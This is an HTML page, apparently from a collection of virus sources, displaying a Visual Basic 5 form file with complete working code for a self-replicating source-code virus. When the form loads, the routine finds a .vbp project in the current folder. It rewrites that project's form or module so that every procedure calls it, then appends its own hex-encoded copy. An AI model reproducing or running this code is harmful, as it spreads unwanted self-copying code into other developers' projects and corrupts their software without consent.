<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Untitled Document</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>

<body bgcolor="#000000" text="#0000FF" link="#0000CC" vlink="#0000CC">
<pre><font face="Lucida Console">VERSION 5.00
Begin VB.Form Form1 
   Caption         =   "Form1"
   ClientHeight    =   3195
   ClientLeft      =   60
   ClientTop       =   345
   ClientWidth     =   4680
   LinkTopic       =   "Form1"
   ScaleHeight     =   3195
   ScaleWidth      =   4680
   StartUpPosition =   3  'Windows Default
End
Attribute VB_Name = "Form1"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Private Sub Form_Load()

: IT: End Sub

Private Sub IT()
A = "4F6E204572726F7220476F546F205A0D0A4F70656E2044697228222A2E766270"
A = A & "222920466F7220496E7075742041732023310D0A446F20556E74696C20454F46"
A = A & "2831290D0A496E7075742023312C20420D0A466F722058203D203120546F2032"
A = A & "0D0A49662058203D2031205468656E2043203D2022466F726D3D2220456C7365"
A = A & "2043203D20224D6F64756C653D220D0A496620496E53747228312C20422C2043"
A = A & "2C20766254657874436F6D7061726529203C3E2030205468656E0D0A44203D20"
A = A & "5265706C616365284D696428422C20496E53747228312C20422C202220222C20"
A = A & "766254657874436F6D7061726529202B20312C204C656E284229292C2022466F"
A = A & "726D3D222C202222290D0A4578697420446F0D0A456E642049660D0A4E657874"
A = A & "0D0A4C6F6F700D0A436C6F73652023310D0A4F70656E204420466F7220496E70"
A = A & "75742041732023310D0A446F20556E74696C20454F462831290D0A4C696E6520"
A = A & "496E7075742023312C20450D0A46203D204620262045202620766243724C660D"
A = A & "0A4C6F6F700D0A436C6F73652023310D0A496620496E53747228312C20462C20"
A = A & "2250726976617465205375622049542829222C20766254657874436F6D706172"
A = A & "6529203C3E2030205468656E2045786974205375620D0A466F722058203D2031"
A = A & "20546F20320D0A49662058203D2031205468656E2047203D2022456E64205375"
A = A & "622220456C73652047203D2022456E642046756E6374696F6E220D0A46203D20"
A = A & "5265706C61636528462C20766243724C66202620472C20766243724C66202620"
A = A & "223A2049543A202220262047290D0A4E6578740D0A466F722058203D20312054"
A = A & "6F204C656E284129205374657020320D0A48203D204820262043687228222648"
A = A & "222026204D696428412C20582C203229290D0A4E6578740D0A466F722058203D"
A = A & "203120546F204C656E28412920537465702036340D0A49662058202B20363420"
A = A & "3C204C656E284129205468656E0D0A49203D20492026204D696428412C20582C"
A = A & "2036342920262043687228333429202620766243724C662026202241203D2041"
A = A & "20262022202620436872283334290D0A456C73650D0A49203D20492026204D69"
A = A & "6428412C20582C2036342920262043687228333429202620766243724C660D0A"
A = A & "456E642049660D0A4E6578740D0A4F70656E204420466F72204F757470757420"
A = A & "41732023310D0A5072696E742023312C2046202620766243724C662026202250"
A = A & "72697661746520537562204954282922202620766243724C662026202241203D"
A = A & "20222026204368722833342920262049202620480D0A436C6F73652023310D0A"
A = A & "5A3A0D0A45786974205375620D0A456E6420537562"
On Error GoTo Z
Open Dir("*.vbp") For Input As #1
Do Until EOF(1)
Input #1, B
For X = 1 To 2
If X = 1 Then C = "Form=" Else C = "Module="
If InStr(1, B, C, vbTextCompare) <> 0 Then
D = Replace(Mid(B, InStr(1, B, " ", vbTextCompare) + 1, Len(B)), "Form=", "")
Exit Do
End If
Next
Loop
Close #1
Open D For Input As #1
Do Until EOF(1)
Line Input #1, E
F = F & E & vbCrLf
Loop
Close #1
If InStr(1, F, "Private Sub IT()", vbTextCompare) <> 0 Then Exit Sub
For X = 1 To 2
If X = 1 Then G = "End Sub" Else G = "End Function"
F = Replace(F, vbCrLf & G, vbCrLf & ": IT: " & G)
Next
For X = 1 To Len(A) Step 2
H = H & Chr("&H" & Mid(A, X, 2))
Next
For X = 1 To Len(A) Step 64
If X + 64 < Len(A) Then
I = I & Mid(A, X, 64) & Chr(34) & vbCrLf & "A = A & " & Chr(34)
Else
I = I & Mid(A, X, 64) & Chr(34) & vbCrLf
End If
Next
Open D For Output As #1
Print #1, F & vbCrLf & "Private Sub IT()" & vbCrLf & "A = " & Chr(34) & I & H
Close #1
Z:
Exit Sub
End Sub
</font></pre>
<p><a href="source.html"><font size="3" face="Arial, Helvetica, sans-serif">Back 
  to index</font></a></p>
</body>
</html>
